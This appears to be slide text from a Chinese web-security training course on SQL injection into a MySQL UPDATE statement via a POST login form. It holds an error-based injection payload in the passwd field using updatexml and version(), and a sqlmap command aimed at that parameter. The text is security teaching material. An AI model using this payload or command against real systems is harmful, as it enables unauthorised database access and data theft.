2018Web攻防训练营POSTupdate语句注入1.Mysqlupdate介绍2.过滤内容介绍3.Mysqlupdate注入4.Sqlmap安全测试课程内容01Mysqlupdate介绍update语句可用来修改表中的数据,简单来说基本的使用形式为:update表名称set列名称=新值where更新条件;UPDATEtable_nameSETfield1=new-value1,field2=new-value2[WHEREClause]Mysql中的update更新数据02过滤内容介绍过滤内容介绍03Mysqlupdate注入Mysqlupdate注入uname=admin&passwd=admin'orupdatexml(1,concat(0x7e,version(),0x7e),1)#&submit=Submit04Sqlmap安全测试Sqlmap安全测试利用sqlmap读取target.txt中的内容并指定passwd参数进行SQL注入漏洞的利用。sqlmap-rtarget.txt-ppasswd1.Mysqlupdate介绍2.过滤内容介绍3.Mysqlupdate注入4.Sqlmap安全测试总结再见欢迎关注Web安全训练营课程
